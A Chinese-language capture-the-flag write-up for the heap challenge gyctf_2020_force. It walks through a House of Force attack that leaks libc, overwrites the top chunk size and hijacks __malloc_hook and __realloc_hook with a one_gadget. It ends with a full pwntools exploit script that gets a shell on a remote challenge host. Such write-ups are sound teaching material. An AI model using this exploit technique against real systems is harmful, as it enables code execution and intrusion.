gyctf_2020_force
步骤
- 例行检查,64位,保护全开
- 本地试运行一下看看大概的情况,看样子是堆题
- 64位ida载入
main()
add()
show(),感觉这个函数没啥用,就不贴了
能够以溢出等方式控制到 top chunk 的 size 域
能够自由地控制堆分配尺寸的大小
根据上述的条件还有根题目force提示,这题应该是使用house of force的方法,关于house of force的详细解释看ctf wiki
利用思路
- 程序在申请chunk后,会打印出chunk的地址,动调找偏移,我们就可以算出libc_base
- 把top chunk的size改为0xffffffffffffffff(-1的补码)
- 我们申请一个size为malloc_hook和top chunk之间的偏移的chunk,那么就能将top chunk推到malloc_hook附近,劫持malloc_hook为one_gadget,获取shell
利用过程
- 泄露libc
首先申请一个很大的chunk,系统会用mmap分配,mmap分配的这块区域在libc下方,偏移是固定的,所以可以算出libc
libc.address = add(0x200000, 'chunk0\n') #这chunk的大小一定要足够大,我试了好多,都太小了,最后看其他师傅用的0x200000
如图,确定偏移是0x200ff0,因此libc基址可以表示为libc_address = add(0x200000, 'chunk0\n') + 0x200ff0
-
将top chunk大小改为0xFFFFFFFFFFFFFFFF
当使用 top chunk 分配堆块的 size 值是由用户控制的任意值时,可以使得 top chunk 指向我们期望的任何位置,这就相当于一次任意地址写。
由于每次都能读入0x50,只要申请一个比这个小的chunk,就能溢出,我们通过这个溢出,可以把top chunk的size改为0xffffffffffffffff,这样我们就可以不限制地进行分配chunk,贴一下ctfwiki里的图,看检查就能清楚了
用改代码可以修改top chunk,顺便获取了heap的地址heap_addr = add(0x18, 'a'*0x10+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
知道了heap的地址,top_chunk的地址也能直接算出来了top = heap_addr + 0x10
-
劫持malloc_hook
步骤1里面已经获取了lbc,因为程序开了Full RELRO,我们不能劫持GOT表,所以打算劫持malloc_hook,利用one_gadget
计算偏移使得 top chunk 正好落在 __malloc_hook 方,再一次分配区块就可以覆写 __realloc_hook 和 __malloc_hook
malloc_hook = libc.sym['__malloc_hook']
realloc = libc.sym["__libc_realloc"]
offset = malloc_hook - top
system = libc.sym['system']
bin_sh = libc.search('/bin/sh').next()
one_gadget = one_gadget_16[1] + libc_base
- 这边直接利用one_gadget不成功,应该是步骤3里计算的offset条件不满足,我们可以通过
realloc
来调整
可见realloc开始的时候会调用许多的push,然后rsp-0x38,一般来讲one_gadget失效就是rsp没有和0x10对齐的原因,那其实我们给rsp减掉0x38基本上就可以实现对齐了。同时注意rsp减完之后realloc会调用__realloc_hook。
所以我们的做法就是劫持__malloc_hook为realloc+0x10,并劫持__realloc_hook为one_gadget,就可以get shell了
两个钩子是在一起的,所以我们在算offset的时候应该是减0x30,其中0x10处理对齐的运算,0x20是的返回的指针指向&__malloc_hook - 0x10,然后我们就可以对两个钩子一起修改了。
最后使用下面的语句就可以成功劫持malloc_hook,让realloc_hook覆盖为one_gadget
add(offset-0x30, 'aaa\n')
add(0x10, 'a'*8+p64(one_gadget)+p64(realloc+0x10))
完整exp
from pwn import *
r = remote("node3.buuoj.cn", 29522)
#r = process("./gyctf_2020_force")
context.log_level = 'debug'
elf = ELF("./gyctf_2020_force")
libc = ELF('./libc-2.23-64.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]
def add(size, content):
r.recvuntil("2:puts\n")
r.sendline('1')
r.recvuntil("size\n")
r.sendline(str(size))
r.recvuntil("bin addr ")
addr = int(r.recvuntil('\n').strip(), 16)
r.recvuntil("content\n")
r.send(content)
return addr
def show(index):
r.recvuntil("2:puts\n")
r.sendline('2')
libc.address = add(0x200000, 'chunk0\n') + 0x200ff0
success('libc_base'+hex(libc.address))
heap_addr = add(0x18, 'a'*0x10+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
success("heap_addr:"+hex(heap_addr))
top = heap_addr + 0x10
#gdb.attach(r)
malloc_hook = libc.sym['__malloc_hook']
success("malloc_hook"+hex(malloc_hook))
one_gadget = one_gadget_16[1] + libc.address
realloc = libc.sym["__libc_realloc"]
offset = malloc_hook - top
system = libc.sym['system']
bin_sh = libc.search('/bin/sh').next()
success("system:" + hex(system))
success("bin_sh" + hex(bin_sh))
add(offset-0x30, 'aaa\n')
add(0x10, 'a'*8+p64(one_gadget)+p64(realloc+0x10))
r.recvuntil("2:puts\n")
r.sendline('1')
r.recvuntil("size\n")
r.sendline(str(20))
r.interactive()
参考资料:https://www.cnblogs.com/pppyyyzzz/p/14248601.html
https://ctf-wiki.org/pwn/linux/glibc-heap/house_of_force/